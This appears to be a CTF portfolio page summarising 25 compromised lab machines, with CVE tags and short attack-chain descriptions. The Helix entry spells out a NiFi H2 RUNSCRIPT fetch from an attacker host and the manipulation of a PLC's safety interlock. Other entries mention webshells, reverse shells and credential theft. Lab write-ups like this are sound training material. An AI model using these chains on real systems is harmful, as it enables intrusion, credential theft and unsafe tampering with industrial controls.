ls -la ./machines (25)

total
25
pwned
25
locked
9
easy
14
medium
11
DanglingTree [Windows]
Medium
Active DirectorySmarterMailCVE-2026-23760Windows Admin CenterCVE-2026-26119Auth Bypass +8
▲ pwned // not yet retired
Cohort [Linux]
Easy
marimoCVE-2026-39987Pre-Auth RCEWebSocketSSRFPackageKit +4
▲ pwned // not yet retired
Bedside [Linux]
Medium
Apachevhostpdfminer.sixpdf2txtCVE-2025-64512CMap +9
▲ pwned // not yet retired
Paperwork [Linux]
Easy
LPDRFC 1179PJLCommand InjectionPath TraversalSCM_RIGHTS +2
▲ pwned // not yet retired
Enigma [Linux]
Easy
NFSAnonymous ExportCredential DisclosureRoundcubePassword ReuseOpenSTAManager +10
▲ pwned // not yet retired
Connected [Linux]
Easy
FreePBXAsteriskSQL InjectionDefault CredentialsDatabase ManipulationSysadmin Hook +2
▲ pwned // not yet retired
DevHub [Linux]
Medium
MCPJamMCPCVE-2026-23744Unauthenticated RCECommand InjectionJupyter +4
▲ pwned // not yet retired
Reactor [Linux]
Easy
Next.jsReact Server ComponentsCVE-2025-55182CVE-2025-66478React2ShellInsecure Deserialization +7
▲ pwned // not yet retired
Helix [Linux]
Medium
The vhost flow.helix.htb proxies an Apache NiFi 1.21.0 canvas that runs completely unauthenticated — GET /nifi-api/flow/current-user returns anonymous with every permission true — so CVE-2023-34468 (NiFi 0.0.2–1.21.0, fixed 1.22.0, CVSS 8.8) is reachable cold: a DBCPConnectionPool pointed at an H2 in-memory JDBC URL plus an ExecuteSQL processor running RUNSCRIPT FROM 'http://attacker/rce.sql' executes H2's CREATE ALIAS Java stored procedure and returns a shell as nifi. A forgotten support bundle leaves operator's OpenSSH ed25519 key world-readable at /opt/nifi-1.21.0/support-bundles/operator_id_ed25519.bak, giving user.txt. Root is an ICS safety-interlock abuse: operator may sudo /usr/local/sbin/helix-maint-console, which only checks that /opt/helix/state/maintenance_window holds a future timestamp before exec'ing bash -p, and the root helix-safety controller writes that file when the reactor enters a hazardous test band. The loopback-only OPC UA PLC on 127.0.0.1:4840 accepts anonymous writes, so setting Mode=MAINTENANCE, TestOverride=True and slowly ramping CalibrationOffset until Temperature crosses 295 °C — without hitting the 305 °C trip — makes root open the window itself.
Apache NiFiCVE-2023-34468H2 JDBCRUNSCRIPTJava Code InjectionRCE +7
● pwned
Silentium [Linux]
Easy
FlowiseCVE-2025-58434Password Reset Token DisclosureAccount TakeoverCVE-2025-59528Custom MCP +10
▲ pwned // not yet retired
DevArea [Linux]
Medium
Anonymous FTP exposed a Java SOAP service JAR; an MTOM XXE attack against the CXF endpoint leaked the Hoverfly admin password from a systemd unit file, then authenticated RCE via Hoverfly middleware yielded a shell as dev_ryan; privilege escalation exploited a world-writable /bin/bash by writing a SUID-creating wrapper triggered by a root-owned systemd timer.
FTPXXESOAPMTOMApache CXFHoverfly +4
● pwned
Kobold [Linux]
Easy
MCP Inspector STDIO RCE for foothold, PHP code injection in PrivateBin container to leak credentials, Docker escape via Arcane container management.
MCPDockerPrivateBinPHP-injectionpassword-reuseArcane
● pwned
VariaType [Linux]
Medium
Exploited fonttools CVE-2025-66034 designspace path traversal to write a PHP webshell, escalated to user via FontForge archive command injection, then root via setuptools PackageIndex arbitrary file write to cron.d.
fonttoolsCVE-2025-66034path-traversalPHP-injectionLFIgit-exposure +5
● pwned
CCTV [Linux]
Easy
Default ZoneMinder credentials lead to RCE as www-data. Lateral movement via cracked bcrypt hash to SSH as mark, then sniffing Docker inter-container traffic for sa_mark credentials. Privilege escalation by abusing motionEye running as root to inject a reverse shell into camera event hooks.
ZoneMinderDefault CredentialsDockermotionEyeCredential SniffingRCE
● pwned
Interpreter [Linux]
Medium
Pre-auth RCE via CVE-2023-43208 XStream deserialization in Mirth Connect 4.4.0, lateral movement through MySQL credential extraction and password hash replacement, privilege escalation via Python eval() injection in an internal Flask notification app running as root.
XStream DeserializationMirth ConnectCVE-2023-43208HL7/MLLPPython eval() Injection
● pwned
WingData [Linux]
Easy
Unauthenticated RCE in Wing FTP Server v7.4.3 via NULL byte Lua injection (CVE-2025-47812), lateral movement through cracked FTP user password hash, and root via Python tarfile data filter PATH_MAX bypass (CVE-2025-4517).
Wing FTP ServerCVE-2025-47812Lua injectionpassword crackinghashcattarfile filter bypass +3
● pwned
Pterodactyl [Linux]
Medium
Unauthenticated RCE via Pterodactyl Panel LFI (CVE-2025-49132), credential reuse for SSH, then privilege escalation via PAM session injection (CVE-2025-6018) chained with udisks2 XFS resize race condition (CVE-2025-6019) to obtain root.
CVE-2025-49132LFIpearcmdRCECVE-2025-6018CVE-2025-6019 +6
● pwned
Facts [Linux]
Easy
Exploited CamaleonCMS path traversal (CVE-2024-46987) to extract MinIO credentials and an encrypted SSH key, then escalated via sudo facter --custom-dir to root.
CamaleonCMSCVE-2024-46987LFIMinIOSSH Key CrackingFacter Sudo Abuse
● pwned
Overwatch [Windows]
Medium
Windows AD DC with anonymous SMB share leaking .NET app credentials, MSSQL linked server DNS poisoning for credential capture, and WCF SOAP service command injection for SYSTEM access.
Active DirectoryMSSQLWCFCommand InjectionDNS PoisoningLinked Server +1
● pwned
AirTouch [Linux]
Medium
WiFi-centric box involving SNMP credential leak, WPA PSK cracking, web app file upload via cookie manipulation, WPA-Enterprise evil twin attack, and hostapd-wpe EAP user file credential disclosure for privilege escalation.
WiFiSNMPWPA-EnterprisePEAPMSCHAPv2Docker +4
● pwned
Browsed [Linux]
Medium
Malicious Chrome MV3 extension uploaded to server-side browser achieved RCE via bash arithmetic evaluation in a Flask/bash backend, then escalated to root via .pyc injection into a world-writable __pycache__ directory of a sudo-allowed Python script.
Chrome extensionbash arithmetic evaluationPython pyc injectionsudo abuseGiteaFlask
● pwned
MonitorsFour [Windows]
Easy
IDOR credential leak, Cacti SQL injection to stacked-query log poisoning RCE, and Docker Desktop API escape to root.
IDORCactiSQLiRCEDockerDocker Desktop Escape +3
● pwned
Expressway [Linux]
Easy
IKEv1 Aggressive Mode PSK hash capture and offline brute-force reveals SSH credentials; custom sudo 1.9.17 binary is exploited via CVE-2025-32463 NSS library injection to achieve root.
ikeikev1aggressive-modepskipsecsudo +3
● pwned
Baby [Windows]
Easy
LDAP anonymous bind leaks an initial password in a user description; the target user (Caroline.Robinson) has STATUS_PASSWORD_MUST_CHANGE set, allowing password reset via SAMR; Backup Operators group membership enables direct flag read via FILE_OPEN_FOR_BACKUP_INTENT over SMB.
active-directoryldappassword-must-changebackup-operatorssebackupprivilegewindows-server-2022
● pwned
Eighteen [Windows]
Easy
Windows Server 2025 DC with MSSQL impersonation leading to credential extraction, password spray for WinRM access, and BadSuccessor dMSA privilege escalation to Domain Admin.
MSSQLSQL ImpersonationPBKDF2dMSABadSuccessorActive Directory +1
● pwned